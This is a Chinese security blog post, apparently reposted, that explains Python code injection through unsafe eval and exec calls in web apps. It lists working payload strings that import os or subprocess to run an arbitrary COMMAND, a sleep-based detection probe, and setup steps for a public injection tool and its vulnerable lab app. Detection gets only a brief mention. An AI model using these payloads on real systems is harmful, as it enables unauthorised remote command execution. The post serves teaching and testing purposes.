以下关于python中命令注入_【奇技淫巧】python代码注入

原标题:【奇技淫巧】python代码注入

1.限号季,发一下之前的一点笔记写的很浅显希望各位大佬勿喷

.在挖掘某专属厂商的时候出现了一个有意思的地方,python代码执行

3db7954cdc8a79fa4c36f8702b4c2b6d.png

2.简单的进行验证一下可以发现sleep进行了执行

665f7147c024a5521e713ae33d5e2d08.png

3.基本确定存在python代码执行漏洞,但是如何利用呢,翻到一篇安全客的文章https://www.anquanke.com/post/id/84891 是一篇翻译的文章 ,简单的进行解析一下。

文章解析:

python代码注入的原因:

当你在网上搜索关于python的eval函数时,几乎没有文章会提醒你这个函数是非常不安全的,而eval函数就是导致这个Python代码注入漏洞的罪魁祸首。如果你遇到了下面这两种情况,说明你的Web应用中存在这个漏洞:

1. Web应用接受用户输入(例如GET/POST参数,cookie值);

2. Web应用使用了一种不安全的方法来将用户的输入数据传递给eval函数(没有经过安全审查,或者缺少安全保护机制);

3.除了eval函数之外,Python的exec函数也有可能让你的Web应用中出现这个漏洞

这是文章中给的示例代码

8653ee1f550840d82e1f28b45c62c091.png

总结来说就是使用了eval 和exec函数没有进行过滤

4.然后作者提供了几个验证的payload

1.通过返回时间验证

eval(compile('for x in range(1):n import timen time.sleep(20)','a','single'))上面已经给了验证

2.命令执行

eval(compile("""for x in range(1):n import osn os.popen(r'COMMAND').read""",'','single'))

970682f398a0841ff5827423f27d96f4.png

3.eval(compile("""__import__('os').popen(r'COMMAND').read""",'','single'))命令执行

4.__import__('os').popen('COMMAND').read命令执行

5.作者提供了一个python代码执行利用工具https://github.com/sethsec/PyCodeInjection ,自己简单测试了一下,没成功有兴趣的可以研究一下

作者提供的复现环境:

gitclone https://github.com/sethsec/PyCodeInjection.git

cd VulnApp

./install_requirements.sh

python PyCodeInjectionApp.py

6.作者还提到了一个场景当全局函数“__import__”会不起作用的时候可以利用for循环

eval(compile( """for x in range(1):n import osn os.popen(r'COMMAND').read""", '', 'single')) eval(compile( """for x in range(1):n import subprocessn subprocess.Popen(r'COMMAND',shell=True, stdout=subprocess.PIPE).stdout.read""", '', 'single')) eval(compile( """for x in range(1):n import subprocessn subprocess.check_output(r'COMMAND',shell=True)""", '', 'single'))

另外作者提到了一个点:为了将这个Payload发送给目标Web应用,你需要对其中的某些字符进行URL编码,但是我在进行验证的时候并不需要可能是场景的问题,具体的话还有很多需要探索的。

如何检测:这是作者提供的,我简单的理解就是hhh用burp或者扫描器检测

具体也去搜索了一下发现国内并没有多少python代码注入漏洞的文章,如果有更好的检测方法可以在下面留言返回搜狐,查看更多

责任编辑:

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值